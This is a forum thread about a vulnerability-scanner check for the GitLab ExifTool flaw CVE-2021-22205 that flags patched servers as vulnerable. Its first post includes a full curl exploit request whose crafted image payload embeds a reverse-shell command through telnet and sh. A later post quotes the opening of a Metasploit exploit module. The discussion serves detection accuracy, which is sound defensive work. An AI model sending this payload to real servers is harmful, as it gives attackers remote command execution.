Gitlab cve-2021-22205 remote check

brian_w_gray · November 17, 2021, 4:44pm

I’m ecstatic that a cookie finger print and remote check was made available for Gitlab cve-2021-22205 we run a lot of gitlab instances and the check is so close but it looks like the implementation is off by just a little bit.

R7 has a great analysis for the vulnerability that absolutely helps in narrowing down the false positives! CVE-2021-22205 | AttackerKB

Getting right down to it. The check sends a POST to /rapid7/cve-2021-22205.jpg which does trigger a 422 response but it triggers it in patched systems too. It looks like the logic issue is that no image data is actually being posted and the gitlab router still responds with a 422 on a patched system.

<?xml version="1.0" encoding="UTF-8"?>
<!--
   Checks if the instance is running gitlabs
       if successful it will send a bogus image to the uri
           check the response
               if we get a 422
                   vulnerable
-->
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS">
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <HTTPCheck>
      <HTTPRequest method="POST">
         <URI>/rapid7/cve-2021-22205.jpg</URI>
         <HTTPResponse code="422"/>
      </HTTPRequest>
   </HTTPCheck>
</VulnerabilityCheck>

However if you POST image data to the Gitlab service it will provide the expected 404 if it has been patched. So something like the following gets the appropriate response.

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1' -H $'Content-Type: multipart/form-data; boundary=------------------------3749bbf4d5269117' -H $'Connection: close' \
    --data-binary $'--------------------------3749bbf4d5269117\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"cve-2021-22205.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0aAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0a\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\x0aFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0a\x09(Copyright \"\\\x0a\" . qx{TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 5555 0<$TF | sh 1>$TF} . \\\x0a\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \x0a\x0d\x0a--------------------------3749bbf4d5269117--\x0d\x0a' \
    $'http://127.0.0.1/de0cf91a2f2aafef'

I’m trying to determine if there is a best practice for setting a benign image payload in the check to post image data for an updated check? something like but not exactly

<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS">
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <HTTPCheck>
      <HTTPRequest method="POST">
         <URI>/rapid7_cve-2021-22205</URI>
            <mimeContent type="multipart/form-data">
              <value format="hex">{insert payload hex here}</value>
            </mimeContent>
         <HTTPResponse code="422"/>
      </HTTPRequest>
   </HTTPCheck>
</VulnerabilityCheck>

vanush_paturyan · December 6, 2021, 6:17pm

Got an F+ report on our Gitlab version 14.4.2, and was pulling my hair out trying to figure out what’s the difference between the IVM’s check and Metasploit modules, then found your excellent writeup!

brian_w_gray · January 5, 2022, 12:13am

I see that the check was converted to use msf instead. ./MetasploitRemoteScanner/1/checks.jar

<?xml version="1.0" encoding="UTF-8"?>
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS"> 
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <Metasploit module="exploit/multi/http/gitlab_exif_rce"></Metasploit>
</VulnerabilityCheck>

github.com

rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/gitlab_exif_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',
        'Description' => %q{
          This module exploits an unauthenticated file upload and command
          injection vulnerability in GitLab Community Edition (CE) and

This file has been truncated. show original

Which does actually post content properly sans SSO redirect edge cases. Thank you so much to the check dev team for getting this into place!